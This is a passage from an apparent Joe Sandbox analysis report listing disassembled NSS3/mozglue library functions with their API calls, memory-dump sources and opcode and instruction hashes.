                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EACC0: TlsGetValue.KERNEL32 ref: 6C6EAD3C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EACC0: calloc.MOZGLUE(00000001,?), ref: 6C6EAD8C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EACC0: PR_Unlock.NSS3 ref: 6C6EADC0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EACC0: PR_Unlock.NSS3 ref: 6C6EAE8C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EACC0: free.MOZGLUE(?), ref: 6C6EAEAB
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(6C853084,6C8502AC,00000090), ref: 6C78AF94
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
                                                                                                                                                                                                                                                                                          • String ID: SSL
                                                                                                                                                                                                                                                                                          • API String ID: 2424436289-2135378647
                                                                                                                                                                                                                                                                                          • Opcode ID: 01c39281691f88d118b193e1a3b5b24d6a4a07937d6cbc7777840f4f9f9f9f4f
                                                                                                                                                                                                                                                                                          • Instruction ID: 9c664460cf9da711b0546a8e77651fa1221755a7f77fd2416001d8130b9f9f84
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 01c39281691f88d118b193e1a3b5b24d6a4a07937d6cbc7777840f4f9f9f9f4f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98217FB2306B489ADAE1DF51AA43313BEB1B30261DB905678C3180BB36D3B95818DFD5
                                                                                                                                                                                                                                                                                          Function 6C6E0F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_GetPageSize.NSS3(6C6E0936,FFFFE8AE,?,6C6716B7,00000000,?,6C6E0936,00000000,?,6C67204A), ref: 6C6E0F1B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E1370: GetSystemInfo.KERNEL32(?,?,?,?,6C6E0936,?,6C6E0F20,6C6E0936,FFFFE8AE,?,6C6716B7,00000000,?,6C6E0936,00000000), ref: 6C6E138F
                                                                                                                                                                                                                                                                                          • PR_NewLogModule.NSS3(clock,6C6E0936,FFFFE8AE,?,6C6716B7,00000000,?,6C6E0936,00000000,?,6C67204A), ref: 6C6E0F25
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E1110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C6E0936,00000001,00000040), ref: 6C6E1130
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E1110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6E0936,00000001,00000040), ref: 6C6E1142
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E1110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6E0936,00000001), ref: 6C6E1167
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: InfoModulePageSecureSizeSystemcallocstrdup
                                                                                                                                                                                                                                                                                          • String ID: clock
                                                                                                                                                                                                                                                                                          • API String ID: 536403800-3195780754
                                                                                                                                                                                                                                                                                          • Opcode ID: 701f13216e0f7bedb9b4252a8dcc5c7dc47a015faac78c20fe2da9ba9147d9a8
                                                                                                                                                                                                                                                                                          • Instruction ID: 22f1d066ef2f1ae3df81a94b9cdee18c50095a561ad43d92a41b3db9bfc2273d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 701f13216e0f7bedb9b4252a8dcc5c7dc47a015faac78c20fe2da9ba9147d9a8
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CD0223120A10452C22023579C48BAAB2ACC7C737DF000837E10801E020FAC90DEF2ED
                                                                                                                                                                                                                                                                                          Function 6C750DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Value$calloc
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3339632435-0
                                                                                                                                                                                                                                                                                          • Opcode ID: da6ba1ecc569d68a5e50c2d8ee2d6bec1c40ae315fc0730f5f5576c04f08bc9f
                                                                                                                                                                                                                                                                                          • Instruction ID: 17e639ffb29e81228d72085b4104ac9a4ce34956bb215b0654759bdd7505a334
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da6ba1ecc569d68a5e50c2d8ee2d6bec1c40ae315fc0730f5f5576c04f08bc9f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B43192707493848BDB607F78864926977BCBF0A30CFA1467DD88887A11DF3484A5CBC5
                                                                                                                                                                                                                                                                                          Function 6C750F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C6F2AF5,?,?,?,?,?,6C6F0A1B,00000000), ref: 6C750F1A
                                                                                                                                                                                                                                                                                          • malloc.MOZGLUE(00000001), ref: 6C750F30
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C750F42
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C750F5B
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Valuemallocmemcpystrlen
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2332725481-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 5dda08c1a219c3ae6a1c6127beaafa0f7333f5737f621725ee9dce2ac4c23772
                                                                                                                                                                                                                                                                                          • Instruction ID: c168e37657f060761adca5249accba5690deac146a986950bab64fbb01333726
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5dda08c1a219c3ae6a1c6127beaafa0f7333f5737f621725ee9dce2ac4c23772
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1201DDB1F0528057E7202B3E9F0455676ACEF5725DF414535EC08C2A51DF35C455C6D6
                                                                                                                                                                                                                                                                                          Function 6C701EB0 Relevance: 5.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 02b771e9d05ae2d615e4d32deea2cbd8c361caa53468ff2e5f180487f56812b1
                                                                                                                                                                                                                                                                                          • Instruction ID: 89e0fc5eb440e65f62ac4a6cfc581df36705d516bab520d11fbc2350ae02d285
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02b771e9d05ae2d615e4d32deea2cbd8c361caa53468ff2e5f180487f56812b1
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80F05EF17016056BEB10EB69DC89E6B73ACEF456ADB144839EC1AC3A01E725F414C7E2